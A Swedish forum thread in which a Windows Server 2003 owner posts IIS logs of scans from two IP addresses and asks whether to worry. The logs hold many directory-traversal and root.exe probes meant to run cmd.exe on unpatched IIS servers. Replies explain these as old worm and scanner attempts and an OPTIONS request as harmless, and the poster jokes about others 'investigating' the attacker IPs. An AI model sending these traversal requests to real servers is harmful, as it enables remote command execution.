Forum Mjukvara Microsoft Windows Tråd

Säkerhet i win server 2003

1
Skriv svar
Permalänk
Medlem

Säkerhet i win server 2003

Hejsan

Jag har installerat windows 2003 på min server och nu också startat webservertjänsten. Port 80 är vidarebefodrad från min brandvägg och jag länkade till lite bilder i en tråd här.

I loggen för servern kunde jag samma dag som jag länkat till bilderna läsa:

#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2003-07-18 22:17:14 192.168.1.1 GET /scripts/root.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /MSADC/root.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /c/winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /d/winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:14 192.168.1.1 GET /scripts/winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:15 192.168.1.1 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:15 192.168.1.1 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:15 192.168.1.1 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64
2003-07-18 22:17:15 192.168.1.1 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 80 - 217.215.62.171 - 404 0 64

Någon (som har Bostream) har haft tråkigt och försökt att hitta min windowskatalog
(som om jag nu skulle lägga upp den på en http-server )

Dagen efter kommer också detta tillskott:

#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2003-07-19 01:11:10 192.168.1.1 HEAD / - 80 - 216.201.149.4 - 403 14 5
2003-07-19 01:11:10 192.168.1.1 HEAD /MSADC/root.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:11 192.168.1.1 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:12 192.168.1.1 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:13 192.168.1.1 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:13 192.168.1.1 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:13 192.168.1.1 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:16 192.168.1.1 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:16 192.168.1.1 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:16 192.168.1.1 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:17 192.168.1.1 HEAD /_vti_bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:11:17 192.168.1.1 HEAD /_vti_bin/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:03 192.168.1.1 HEAD /_vti_cnf/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:03 192.168.1.1 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:03 192.168.1.1 HEAD /adsamples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:04 192.168.1.1 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:04 192.168.1.1 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:04 192.168.1.1 HEAD /cgi-bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:05 192.168.1.1 HEAD /d/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:05 192.168.1.1 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:05 192.168.1.1 HEAD /iisadmpwd/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:07 192.168.1.1 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:07 192.168.1.1 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:08 192.168.1.1 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:10 192.168.1.1 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:10 192.168.1.1 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:10 192.168.1.1 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:11 192.168.1.1 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:12 192.168.1.1 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:13 192.168.1.1 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:13 192.168.1.1 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:13 192.168.1.1 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:14 192.168.1.1 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:14 192.168.1.1 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:14 192.168.1.1 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:15 192.168.1.1 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:15 192.168.1.1 HEAD /samples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:15 192.168.1.1 HEAD /scripts..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:17 192.168.1.1 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:18 192.168.1.1 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:18 192.168.1.1 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:18 192.168.1.1 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:19 192.168.1.1 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:19 192.168.1.1 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:19 192.168.1.1 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:20 192.168.1.1 HEAD /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:20 192.168.1.1 HEAD /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:21 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:24 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:24 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:25 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:25 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:25 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:26 192.168.1.1 HEAD /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:26 192.168.1.1 HEAD /scripts/root.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3
2003-07-19 01:12:26 192.168.1.1 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 216.201.149.4 - 404 0 3

Därför undrar jag nu om det är något speciellt man bör ändra i inställningarna (kör i princip med standard).
Jag tolkar statusen 404 som att de inte hittade vad de letade efter och hoppas det stämmer :D.

Tacksam för alla (hjälpande;)) svar.

Redigera
Citera flera Citera
Permalänk
Medlem

ingen fara..

Visa signatur

~ When there's no more room in hell, the dead will walk the earth. ~

Redigera
Citera flera Citera
Permalänk
Hedersmedlem

IIS 6 är inställt att inte exekvera något alls som standard så du är ganska säker.
Det var tidigare IIS-versioner som hade buggar som gjorde att man kunde exekvera program som det inte var meningen att de skulle gå att köra, och virus och scriptkiddies testar detta genom att försöka köra en enkel "dir"-kommando och se om det funkar, funkar det går det att köra vilka program och kommandon som helst på den servern.
Detta blev fixat med en patch för lääänge sen, men det finns fortfarande folk som inte patchat sina gamla IIS-servrar.

Visa signatur

Nämen hej!

Redigera
Citera flera Citera
Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Shark^
ingen fara..

Tack. Jag är inte orolig heller men jag tycte det var bäst att störa er lite med dumma frågor

Förresten...Om någon skulle få tråkigt någon dag så finns det ju alltid två ipnummer en bit upp som kan vara värda att undersöka :D.

Redigera
Citera flera Citera
Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Donan Fear
IIS 6 är inställt att inte exekvera något alls som standard så du är ganska säker.
Det var tidigare IIS-versioner som hade buggar som gjorde att man kunde exekvera program som det inte var meningen att de skulle gå att köra, och virus och scriptkiddies testar detta genom att försöka köra en enkel "dir"-kommando och se om det funkar, funkar det går det att köra vilka program och kommandon som helst på den servern.
Detta blev fixat med en patch för lääänge sen, men det finns fortfarande folk som inte patchat sina gamla IIS-servrar.

Frågan är dock denna rad:

#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 
2003-07-19 06:50:39 192.168.1.1 OPTIONS / - 80 - 212.238.186.237 Microsoft-WebDAV-MiniRedir/5.1.2600 200 0 0

... ser lite läskig ut =/

Redigera
Citera flera Citera
Permalänk
Medlem

ingen fara där heller

Visa signatur

~ When there's no more room in hell, the dead will walk the earth. ~

Redigera
Citera flera Citera
Permalänk
Hedersmedlem

Det är bara någon (212.238.186.237) med klienten Microsoft-WebDAV-MiniRedir/5.1.2600 (Windows XP) som frågar din server vilka HTTP-kommandon den tillåter.

Svaret från servern brukar se ut ungefär såhär:

Citat:

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD
Content-Length: 0
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sat, 19 Jul 2003 19:45:01 GMT

Visa signatur

Nämen hej!

Redigera
Citera flera Citera
1
Skriv svar
Senaste nyheterna
Hårdvara
Mjukvara
Övrigt
Nytt i forumet
Datorkomponenter
System
Ljud, bild och kommunikation
Spel och mjukvara